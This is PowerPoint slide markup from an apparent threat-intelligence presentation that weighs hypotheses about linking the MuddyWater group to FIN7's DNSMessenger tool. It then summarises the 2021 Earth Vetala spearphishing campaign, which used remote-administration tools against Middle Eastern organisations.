            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>“Later in our investigation, the same command server also delivered a variant of the DNS messenger similar to that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>described by Talos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>. The domain names differed but the script adheres to the same logic (including the logic function).”</a:t>
            </a:r>
            <a:endParaRPr sz="3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ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The DNSMessenger malware is an obfuscated and customized version of the popular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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DNS_TXT_PWNAGE.ps1 script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> available on GitHub and is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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also referred to by FireEye as POWERSOURCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. The use of the DNSMessenger tool appears primarily linked to FIN7, with no other samples being attributable to MuddyWater.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>This led us to query the relationship between the newer attacks we were looking at and the alleged FIN7 link. As part of this research, we came up with the following hypotheses along with their likelihoods, and a rationale for each one.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>1) The FIN7 threat actor is also involved in espionage in the Middle East - Unlikely</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Whilst this may seem an attractive hypothesis to some, there are aspects on the technical side that simply don’t add up. Primarily, there are significant disparities between FIN7 and MuddyWater, specifically in terms of:</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Malware unique to FIN7, or commonly used by them has not yet been seen in any MuddyWater investigations (except for the single observation of the DNSMessenger sample)</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Other non-public malware and tools used by MuddyWater have not been observed in our FIN7 investigations.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>From an infrastructure point of view there is no overlap between the two sets of activity, the only overlap is the use of the unique tool “DNSMessenger”</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>When these points are considered together in conjunction with the significant difference in targeting they make a strong case for classifying this activity as distinct from FIN7 activity.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>2) The DNSMessenger malware is a shared tool, used by FIN7, MuddyWater and perhaps other groups - Unlikely</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We have attempted to find examples of code available in public data sources that would generate the variation of the DNSMessenger malware and had little luck in doing so. Even though the code for DNSMessenger is publicly available following research into attackers published by 3rd parties, attackers would have to write the corresponding server side to use it, and as such they may well choose to use the public DNS_TXT_Pwnage.ps1 script instead.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Despite this, based on the chain of analysis above we cannot discount the notion that DNSMessenger is shared by multiple attackers, including FIN7 and MuddyWater.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>3) There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 -  Possible</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn’t possible for us to verify this link.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>4) The attackers realized they were under investigation and planted a false flag - Possible</a:t>
            </a:r>
            <a:endParaRPr sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The attackers realized they were under investigation and planted a false flag on their C2 server, uploading a copy of the FIN7 DNSMessenger code which had been previously mentioned (and was since publicly available) by FireEye and delivering it to researchers to trick them into mis-attributing the campaign.</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Indeed, the sample shared by Morphisec on PasteBin is identical to the one dropped by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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the sample discussed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> in the FireEye FIN7 SEC campaign blog except for the final line.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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="105975"/>
            <a:ext cx="8520600" cy="48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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network. In any case we will continue to track their activities to provide protections for our customers.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We hope the analysis presented shows the importance of drawing your own conclusions based on the data available to you, not just taking the conclusions given in the public domain at face value. This is especially true when actors who rely on slightly modified (and publicly available) open source tools are in play. Copycat threat actors can easily mimic attackers who use open source tools which can confuse attribution efforts meaning more than one aspect of the attacks observed must be considered when clustering.</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>On top of this, whilst the vast majority of threat analysis in the public domain is repeatable and correct, in some cases it can be difficult to verify the analysis available. When it is hard to reproduce the analysis the confidence in any conclusions drawn must be lower than it would otherwise be, since you cannot know for sure that what is stated is true.</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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="70650"/>
            <a:ext cx="85206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ru" sz="3100"/>
              <a:t>2021</a:t>
            </a:r>
            <a:endParaRPr sz="3100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Google Shape;149;p29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="699450"/>
            <a:ext cx="9144000" cy="4401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ru" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Trend Micro researchers recently detected activity targeting various organizations in the Middle East and neighboring regions. We were tipped off to this activity in part by research from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">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Anomali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, which also identified a campaign targeting similar victims. We believe (with moderate confidence) that this newly identified activity is connected to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (also known as TEMP.Zagros, Static Kitten, Seedworm).</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Additionally, we were able to link the Anomali-identified activity to an ongoing campaign in 2021. This campaign uses the following legitimate remote admin tools such as:</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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ScreenConnect</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-314325" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1350"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="➢"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="1350">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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RemoteUtilities</a:t>
            </a:r>
            <a:endParaRPr sz="1350">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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We have named this intrusion set Earth Vetala. Earth Vetala used spearphishing emails with embedded links to a legitimate file-sharing service to distribute their malicious package. The links were embedded within lure documents as well as emails.</a:t>
            </a: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Once a victim was accessed, attackers would determine if the user account was an administrator or normal user. They would then download post-exploitation tools that included password/process-dumping utilities, reverse-tunneling tools, and custom backdoors. The threat actors would then initiate communications with additional command-and-control (C&amp;C) infrastructure to execute obfuscated PowerShell scripts.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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63575" y="63575"/>
            <a:ext cx="8768700" cy="503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Analysis indicates the Earth Vetala campaign is ongoing and that this threat actor has interests which appear to align with Iran.</a:t>
            </a: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Earth Vetala historically targets countries in the Middle East. In this campaign, Earth Vetala threat actors used spearphishing emails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. The phishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute archives containing the ScreenConnect remote administrator tool. ScreenConnect is a legitimate application that allows systems administrators to manage their enterprise systems remotely.</a:t>
